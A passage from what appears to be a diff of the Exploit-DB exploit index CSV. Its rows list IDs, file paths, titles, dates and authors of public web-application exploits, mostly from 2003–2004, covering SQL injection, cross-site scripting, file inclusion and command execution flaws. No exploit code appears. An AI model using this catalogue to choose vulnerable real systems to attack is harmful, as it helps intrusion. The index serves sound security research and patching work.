Scripting",2003-09-09,"Boy Bear",webapps,php, +23132,exploits/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal",2012-12-04,Nin3,webapps,windows, +23140,exploits/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,webapps,php, +23153,exploits/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i - Cross-Site Scripting",2003-09-16,dr_insane,webapps,cgi, +23158,exploits/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - 'banners.php?bid' SQL Injection",2003-09-18,"Lifo Fifo",webapps,php, +23159,exploits/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - 'emailarticle.php?id' SQL Injection",2003-09-18,"Lifo Fifo",webapps,php, +23160,exploits/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - 'contact.php' Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",webapps,php, +23163,exploits/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure",2003-09-19,"H Zero Seven",webapps,php, +23164,exploits/php/webapps/23164.txt,"myPHPNuke 1.8.8 - 'auth.inc.php' SQL Injection",2003-09-20,"Lifo Fifo",webapps,php, +40403,exploits/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",webapps,php,80 +23175,exploits/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple HTML Injections",2003-09-24,"Bahaa Naamneh",webapps,php, +23180,exploits/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection",2012-12-06,"Woody Hughes",webapps,php, +23184,exploits/windows/webapps/23184.txt,"Software602 602Pro LAN SUITE 2003 - Sensitive User Information Storage",2003-09-25,"Phuong Nguyen",webapps,windows, +23192,exploits/php/webapps/23192.txt,"GuppY 2.4 - HTML Injection",2003-09-29,"David Suzanne",webapps,php, +23193,exploits/php/webapps/23193.txt,"Geeklog 1.3.x - SQL Injection",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +23194,exploits/php/webapps/23194.txt,"Geeklog 1.3.x - Cross-Site Scripting",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",webapps,php, +23195,exploits/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 - MSG Cross-Site Scripting",2003-09-29,G00db0y,webapps,asp, +23202,exploits/freebsd/webapps/23202.txt,"m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-12-07,"Yann CAM",webapps,freebsd, +23205,exploits/php/webapps/23205.txt,"DCP-Portal 5.5 - 'advertiser.php?Password' SQL Injection",2003-10-01,"Lifo Fifo",webapps,php, +23206,exploits/php/webapps/23206.txt,"DCP-Portal 5.5 - 'lostpassword.php?email' SQL Injection",2003-10-01,"Lifo Fifo",webapps,php, +23207,exploits/php/webapps/23207.txt,"Atrise Everyfind 5.0.2 - search Cross-Site Scripting",2003-10-01,Ezhilan,webapps,php, +23208,exploits/php/webapps/23208.txt,"mpnews pro 2.1.0.18 - Directory Traversal Information Disclosure",2003-10-01,"Gama Sec",webapps,php, +23213,exploits/php/webapps/23213.txt,"WordPress 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",webapps,php, +23214,exploits/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - 'Message.cgi' Cross-Site Scripting",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",webapps,cgi, +23217,exploits/cgi/webapps/23217.txt,"Divine Content Server 5.0 - Error Page Cross-Site Scripting",2003-10-03,valgasu,webapps,cgi, +23218,exploits/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Inclusion",2003-10-04,frog,webapps,php, +23219,exploits/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,webapps,php, +23220,exploits/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,webapps,php, +23232,exploits/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Inclusion",2003-10-08,"Zone-h Security Team",webapps,php, +23233,exploits/php/webapps/23233.txt,"GeekLog 1.3.x - HTML Injection",2003-10-08,Jelmer,webapps,php, +23237,exploits/php/webapps/23237.pl,"PHP-Nuke 6.6 - 'admin.php' SQL Injection",2003-10-08,1dt.w0lf,webapps,php, +23238,exploits/php/webapps/23238.txt,"Gallery 1.4 - 'index.php' Remote File Inclusion",2003-10-11,peter,webapps,php, +23244,exploits/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,webapps,php, +23249,exploits/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent Cross-Site Scripting",2012-12-09,VipVince,webapps,php, +23250,exploits/hardware/webapps/23250.txt,"Cisco DPC2420 - Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",webapps,hardware, +23252,exploits/php/webapps/23252.txt,"Clipbucket 2.6 Revision 738 - Multiple SQL Injections",2012-12-09,"High-Tech Bridge SA",webapps,php, +23253,exploits/php/webapps/23253.txt,"Achievo 1.4.5 - Multiple Vulnerabilities (2)",2012-12-09,"High-Tech Bridge SA",webapps,php, +23256,exploits/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",webapps,cfm, +23259,exploits/php/webapps/23259.txt,"GoldLink 3.0 - Cookie SQL Injection",2003-10-18,Weke,webapps,php, +23260,exploits/php/webapps/23260.sh,"Geeklog 1.3.8 - Forgot Password SQL Injection",2003-10-19,"Jouko Pynnonen",webapps,php, +23261,exploits/php/webapps/23261.txt,"Bytehoard 0.7 - File Disclosure",2003-10-20,Ezhilan,webapps,php, +23262,exploits/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",webapps,jsp, +23264,exploits/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injections",2003-10-20,"Aviram Jenik",webapps,php, +23266,exploits/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr_Ponidi,webapps,cgi, +23268,exploits/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting",2003-10-21,ComSec,webapps,java, +23269,exploits/php/webapps/23269.txt,"FuzzyMonkey 2.11 - MyClassifieds Email Variable SQL Injection",2003-10-21,Ezhilan,webapps,php, +23275,exploits/cgi/webapps/23275.txt,"DansGuardian 2.2.x - Denied URL Cross-Site Scripting",2003-10-22,"Richard Maudsley",webapps,cgi, +23284,exploits/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,webapps,php, +23286,exploits/php/webapps/23286.txt,"Joomla! Component com_jooproperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,webapps,php, +23287,exploits/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,webapps,php, +23289,exploits/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - Cross-Site Request Forgery",2012-12-11,sajith,webapps,php, +23313,exploits/php/webapps/23313.txt,"Ledscripts LedForums - Multiple HTML Injections",2003-10-30,ProXy,webapps,php, +23294,exploits/php/webapps/23294.txt,"Chi Kien Uong Guestbook 1.51 - Cross-Site Scripting",2003-10-27,"Joshua P. Miller",webapps,php, +23302,exploits/php/webapps/23302.txt,"Les Visiteurs 2.0 - Remote File Inclusion",2003-10-27,"Matthieu Peschaud",webapps,php, +23315,exploits/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 - InteractiveQuery.jsp Cross-Site Scripting",2003-10-31,"Corsaire Limited",webapps,jsp, +23319,exploits/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 - Unauthorized Access",2003-10-31,"Virginity Security",webapps,php, +23322,exploits/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,webapps,php, +23324,exploits/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 - Directory Traversal",2012-12-12,"Sebastian Perez",webapps,windows, +23326,exploits/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal",2003-11-01,"Zero X",webapps,asp, +23330,exploits/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting",2003-11-03,"Michael Frame",webapps,php, +23331,exploits/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 - Unauthorized Private Forum Access",2003-11-03,"Alexander Antipov",webapps,asp, +23332,exploits/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",webapps,cgi, +23333,exploits/php/webapps/23333.txt,"PHPKit 1.6 - 'Include.php' Cross-Site Scripting",2003-11-02,ben.moeckel@badwebmasters.net,webapps,php, +23335,exploits/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection",2003-11-03,ekerazha@yahoo.it,webapps,asp, +23336,exploits/php/webapps/23336.txt,"OpenAutoClassifieds 1.0 - 'Listing' Cross-Site Scripting",2003-11-04,"David Sopas Ferreira",webapps,php, +23338,exploits/php/webapps/23338.txt,"John Beatty Easy PHP Photo Album 1.0 - 'dir' HTML Injection",2003-11-04,nimber@designer.ru,webapps,php, +23353,exploits/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 - SQL Injection",2012-12-13,Zixem,webapps,php, +23354,exploits/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent Cross-Site Scripting",2012-12-13,"Mr. P-teo",webapps,php, +23355,exploits/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistent Cross-Site Scripting",2012-12-13,limb0,webapps,php, +23356,exploits/php/webapps/23356.txt,"WordPress Plugin Portable phpMyAdmin - Authentication Bypass",2012-12-13,"Mark Stanislav",webapps,php, +23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php, +23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,webapps,php, +23386,exploits/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",webapps,php, +23359,exploits/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin - 'newreply.php' SQL Injection",2012-12-13,JoinSe7en,webapps,php, +23362,exploits/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3 < 2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,webapps,php, +23363,exploits/php/webapps/23363.txt,"phpBB 2.0.x - 'profile.php' SQL Injection",2003-11-08,JOCANOR,webapps,php, +23367,exploits/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution",2003-11-10,Don_Huan,webapps,cgi, +23370,exploits/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal",2003-11-10,"Beck Mr.R",webapps,cgi, +23372,exploits/php/webapps/23372.txt,"PHP-Coolfile 1.4 - Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,webapps,php, +23381,exploits/php/webapps/23381.txt,"PHPWebFileManager 2.0 - 'index.php' Directory Traversal",2003-11-17,"RusH security team",webapps,php, +23395,exploits/cgi/webapps/23395.txt,"CommerceSQL Shopping Cart 2.2 - 'index.cgi' Directory Traversal",2003-11-24,"Mariusz Ciesla",webapps,cgi, +23402,exploits/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 - Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,webapps,jsp, +23403,exploits/php/webapps/23403.pl,"My_eGallery Module 3.1.1 - Remote File Inclusion Command Injection",2003-11-26,"Bojan Zdrnja",webapps,php, +23406,exploits/php/webapps/23406.txt,"CuteNews 1.3 - Debug Query Information Disclosure",2003-12-01,scrap,webapps,php, +23407,exploits/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 - 'shopsearch.asp' SQL Injection",2003-12-01,"Nick Gudov",webapps,asp, +23408,exploits/asp/webapps/23408.txt,"Virtual Programming VP-ASP 4.00/5.00 - 'shopdisplayproducts.asp' SQL Injection",2003-12-01,"Nick Gudov",webapps,asp, +23409,exploits/cgi/webapps/23409.c,"Jason Maloney's Guestbook 3.0 - Remote Command Execution",2003-12-01,shaun2k2,webapps,cgi, +23410,exploits/cgi/webapps/23410.txt,"IBM Directory Server 4.1 - Web Administration Interface Cross-Site Scripting",2003-12-02,"Oliver Karow",webapps,cgi, +23415,exploits/asp/webapps/23415.txt,"Virtual Programming VP-ASP 4/5 - 'shopdisplayproducts.asp' Cross-Site Scripting",2003-12-05,"Xnuxer Research",webapps,asp, +23416,exploits/php/webapps/23416.txt,"Xoops 1.3.x/2.0.x - Multiple Vulnerabilities",2003-12-06,frog,webapps,php, +23418,exploits/cgi/webapps/23418.pl,"Webgate WebEye - Information Disclosure",2003-12-08,datapath,webapps,cgi, +23420,exploits/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 - 'index.php' Path Cross-Site Scripting",2003-12-09,"Justin Hagstrom",webapps,php, +23421,exploits/cgi/webapps/23421.txt,"calacode @mail webmail system 3.52 - Multiple Vulnerabilities",2003-12-09,"Nick Gudov",webapps,cgi, +23425,exploits/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Persistent Cross-Site Scripting",2012-12-16,limb0,webapps,php, +23428,exploits/php/webapps/23428.html,"Mambo 4.5 Server - 'user.php' Script Unauthorized Access",2003-12-10,frog,webapps,php, +23429,exploits/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server - SQL Injection",2003-12-10,"Chintan Trivedi",webapps,php, +23430,exploits/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injections",2003-12-10,frog,webapps,php, +23432,exploits/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",webapps,cgi, +23434,exploits/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,webapps,php, +23440,exploits/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,webapps,asp, +23443,exploits/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities",2003-12-16,JeiAr,webapps,php, +23445,exploits/php/webapps/23445.txt,"osCommerce 2.2 - 'osCsid' Cross-Site Scripting",2003-12-17,JeiAr,webapps,php, +23447,exploits/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution",2003-12-18,"Paul Craig",webapps,cgi, +23448,exploits/php/webapps/23448.php,"PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,webapps,php, +23453,exploits/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - 'index.inc.php' File Inclusion",2003-12-20,frog,webapps,php, +23454,exploits/php/webapps/23454.txt,"BES-CMS 0.4/0.5 - '/members/index.inc.php' File Inclusion",2003-12-20,frog,webapps,php, +23455,exploits/php/webapps/23455.txt,"BES-CMS 0.4/0.5 - 'message.php' File Inclusion",2003-12-20,frog,webapps,php, +23456,exploits/php/webapps/23456.txt,"BES-CMS 0.4/0.5 - 'start.php' File Inclusion",2003-12-20,frog,webapps,php, +23457,exploits/php/webapps/23457.txt,"BES-CMS 0.4/0.5 - 'folder.php' File Inclusion",2003-12-20,frog,webapps,php, +23458,exploits/php/webapps/23458.txt,"BES-CMS 0.4/0.5 - 'hacking.php' File Inclusion",2003-12-20,frog,webapps,php, +23459,exploits/php/webapps/23459.txt,"Xoops 2.0.5.1 - 'MyLinks Myheader.php' Cross-Site Scripting",2003-12-21,"Chintan Trivedi",webapps,php, +23462,exploits/php/webapps/23462.txt,"osCommerce 2.2 - 'products_id' SQL Injection",2003-12-22,JeiAr,webapps,php, +23463,exploits/php/webapps/23463.txt,"osCommerce 2.2 - 'manufacturers_id' Cross-Site Scripting",2003-12-22,JeiAr,webapps,php, +23466,exploits/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - 'store' Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",webapps,cgi, +23467,exploits/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - 'template' Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",webapps,cgi, +23629,exploits/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,webapps,cgi, +23631,exploits/php/webapps/23631.txt,"PHP-Nuke 6.x (Multiple Modules) - SQL Injection",2004-02-02,"Security Corporation",webapps,php, +23473,exploits/php/webapps/23473.txt,"My Little Forum 1.3 - 'email.php' Cross-Site Scripting",2003-12-23,"David S. Ferreira",webapps,php, +23474,exploits/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - 'Viewshoutbox.php' Cross-Site Scripting",2003-12-23,"Ben Drysdale",webapps,php, +23475,exploits/php/webapps/23475.txt,"phpBB 2.0.6 - 'privmsg.php' Cross-Site Scripting",2003-12-23,"Ben Drysdale",webapps,php, +23476,exploits/php/webapps/23476.txt,"KnowledgeBuilder 2.0/2.1/3.0 - Remote File Inclusion",2003-12-24,"Zero X",webapps,php, +23477,exploits/php/webapps/23477.txt,"Psychoblogger PB-beta1 - 'desc' Cross-Site Scripting",2003-12-24,"Andrew Smith",webapps,php, +23478,exploits/php/webapps/23478.txt,"Psychoblogger PB-beta1 - errormessage Cross-Site Scripting",2003-12-24,"Andrew Smith",webapps,php, +23483,exploits/php/webapps/23483.txt,"OpenBB 1.0 - 'board.php' Cross-Site Scripting",2003-12-27,gr00vy,webapps,php, +23484,exploits/php/webapps/23484.txt,"PHP-Nuke 6.x/7.0 Survey Module - SQL Injection",2003-12-27,idtwolf@pisem.net,webapps,php, +23485,exploits/cgi/webapps/23485.txt,"L-Soft 1.8 - Listserv Multiple Cross-Site Scripting Vulnerabilities",2003-12-26,http-equiv,webapps,cgi, +23486,exploits/php/webapps/23486.txt,"Private Message System 2.x - 'index.php?Page' Cross-Site Scripting",2003-12-27,"David S. Ferreira",webapps,php, +23487,exploits/php/webapps/23487.txt,"PHP-ping - 'Count' Command Execution",2003-12-29,ppp-design,webapps,php, +23488,exploits/cgi/webapps/23488.txt,"BulletScript MailList - bsml.pl Information Disclosure",2003-12-29,M0rf,webapps,cgi, +23494,exploits/php/webapps/23494.txt,"WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload",2012-12-19,DigiP,webapps,php, +23630,exploits/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",webapps,php, +23498,exploits/hardware/webapps/23498.txt,"SonicWALL SonicOS 5.8.1.8 WAF - Cross-Site Scripting",2012-12-19,Vulnerability-Lab,webapps,hardware, +23499,exploits/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-12-19,Vulnerability-Lab,webapps,hardware, +23628,exploits/php/webapps/23628.txt,"JBrowser 1.0/2.x - Unauthorized Admin Access",2004-01-30,"Himeur Nourredine",webapps,php, +23507,exploits/php/webapps/23507.txt,"EasyDynamicPages 1.0 - 'config_page.php' PHP Remote File Inclusion",2004-01-02,tsbeginnervn,webapps,php, +23513,exploits/php/webapps/23513.txt,"Athena Web Registration - Remote Command Execution",2004-01-02,"Peter Kieser",webapps,php, +23515,exploits/asp/webapps/23515.txt,"ASPApp PortalApp - Remote User Database Access",2004-01-04,newbie6290,webapps,asp, +23516,exploits/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access",2004-01-04,"Vietnamese Security Group",webapps,asp, +23517,exploits/php/webapps/23517.txt,"HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion",2004-01-05,Officerrr,webapps,php, +23518,exploits/php/webapps/23518.txt,"HotNews 0.x - 'config[incdir]' Remote File Inclusion",2004-01-05,Officerrr,webapps,php, +23519,exploits/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting",2004-01-04,"David S. Ferreira",webapps,php, +23520,exploits/php/webapps/23520.txt,"PHPGedView 2.61 - Multiple Remote File Inclusions",2004-01-06,Windak,webapps,php, +23691,exploits/php/webapps/23691.txt,"vBulletin 3.0 - 'search.php' Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",webapps,php, +23525,exploits/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,webapps,php, +23526,exploits/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,webapps,php, +23535,exploits/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal",2004-01-10,FIST,webapps,cgi, +23536,exploits/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",webapps,php, +23537,exploits/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution",2004-01-10,"Zero X",webapps,php, +23546,exploits/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,webapps,php, +23547,exploits/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 - 'Adminlogin.asp' SQL Injection",2004-01-16,posidron,webapps,asp, +23548,exploits/cgi/webapps/23548.txt,"MetaDot Portal Server 5.6.x - 'index.pl' Multiple SQL Injections",2004-01-16,JeiAr,webapps,cgi, +23549,exploits/cgi/webapps/23549.txt,"MetaDot Portal Server 5.6.x - index.pl Information Disclosure",2004-01-16,JeiAr,webapps,cgi, +23550,exploits/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,webapps,cgi, +23551,exploits/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x - 'userchannel.pl?op' Cross-Site Scripting",2004-01-16,JeiAr,webapps,cgi, +23553,exploits/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion",2004-01-19,Yo_Soy,webapps,php, +23554,exploits/php/webapps/23554.java,"YABB SE 1.x - 'SSI.php' ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,webapps,php, +23558,exploits/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",webapps,php, +23561,exploits/asp/webapps/23561.txt,"DUware Software - Multiple Vulnerabilities",2004-01-20,"Security Corporation",webapps,asp, +23571,exploits/asp/webapps/23571.txt,"SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload",2012-12-21,040,webapps,asp, +23572,exploits/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP Firmware 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,webapps,hardware, +23573,exploits/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",webapps,php, +23575,exploits/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injections",2012-12-21,"High-Tech Bridge SA",webapps,php, +23599,exploits/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection",2004-01-26,"Bharat Mediratta",webapps,php, +23606,exploits/php/webapps/23606.txt,"Xoops 2.0.x - 'viewtopic.php' Cross-Site Scripting",2004-01-26,"Ben Drysdale",webapps,php, +23607,exploits/php/webapps/23607.txt,"Kietu 2/3 - 'index.php' Remote File Inclusion",2004-01-26,"Himeur Nourredine",webapps,php, +23613,exploits/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",webapps,cgi, +23615,exploits/cgi/webapps/23615.txt,"PJ CGI Neo Review - Directory Traversal",2004-01-29,"Zone-h Security Team",webapps,cgi, +23616,exploits/php/webapps/23616.txt,"PHPGedView 2.x - 'Editconfig_gedcom.php' Directory Traversal",2004-01-30,"Cedric Cochin",webapps,php, +23617,exploits/php/webapps/23617.txt,"PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion",2004-01-30,"Cedric Cochin",webapps,php, +23618,exploits/php/webapps/23618.txt,"JBrowser 1.0/2.x - 'browser.php' Directory Traversal",2004-01-30,"Himeur Nourredine",webapps,php, +23619,exploits/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",webapps,php, +23620,exploits/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",webapps,php, +23621,exploits/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",webapps,php, +23623,exploits/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,webapps,php, +23624,exploits/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,webapps,php, +23625,exploits/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php?id' SQL Injection",2012-12-24,Red_Hat,webapps,php, +23687,exploits/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv Kamir",webapps,php, +23688,exploits/php/webapps/23688.txt,"vBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",webapps,php, +23635,exploits/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D - Directory Traversal",2004-02-02,dr_insane,webapps,asp, +23636,exploits/php/webapps/23636.txt,"Qualiteam X-Cart 3.x - 'general.php?perl_binary' Arbitrary Command Execution",2004-02-03,Philip,webapps,php, +23637,exploits/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - 'upgrade.php?perl_binary' Arbitrary Command Execution",2004-02-03,Philip,webapps,php, +23639,exploits/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,webapps,php, +23640,exploits/php/webapps/23640.txt,"phpMyAdmin 2.x - 'Export.php' File Disclosure",2004-02-03,"Cedric Cochin",webapps,php, +23644,exploits/php/webapps/23644.php,"PHPX 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",webapps,php, +23645,exploits/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection",2004-02-04,G00db0y,webapps,php, +23646,exploits/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,webapps,php, +23647,exploits/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",webapps,cgi, +23653,exploits/php/webapps/23653.txt,"Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",webapps,php, +23657,exploits/php/webapps/23657.txt,"Mambo Open Source 4.6 - 'Itemid' Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",webapps,php, +23659,exploits/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",webapps,cgi, +23663,exploits/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",webapps,php, +23669,exploits/php/webapps/23669.txt,"PHP-Nuke 6.x/7.x 'Reviews' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",webapps,php, +23670,exploits/php/webapps/23670.pl,"PHP-Nuke 6.x/7.x - Public Message SQL Injection",2004-02-09,"Janek Vind",webapps,php, +23673,exploits/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injections",2012-12-26,v3n0m,webapps,php, +23676,exploits/asp/webapps/23676.txt,"Maxwebportal 1.3x - 'down.asp' HTTP_REFERER Cross-Site Scripting",2004-02-10,"Manuel Lopez",webapps,asp, +23677,exploits/asp/webapps/23677.txt,"Maxwebportal 1.3x - Personal Message 'SendTo' Cross-Site Scripting",2004-02-10,"Manuel Lopez",webapps,asp, +23680,exploits/php/webapps/23680.php,"PHP-Nuke 6.x - 'Category' SQL Injection",2003-12-23,pokleyzz,webapps,php, +23683,exploits/php/webapps/23683.txt,"VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",webapps,php, +23684,exploits/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",webapps,php, +23685,exploits/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,webapps,php, +23696,exploits/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",webapps,asp, +23697,exploits/php/webapps/23697.txt,"AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",webapps,php, +23698,exploits/php/webapps/23698.txt,"AllMyVisitors 0.x - 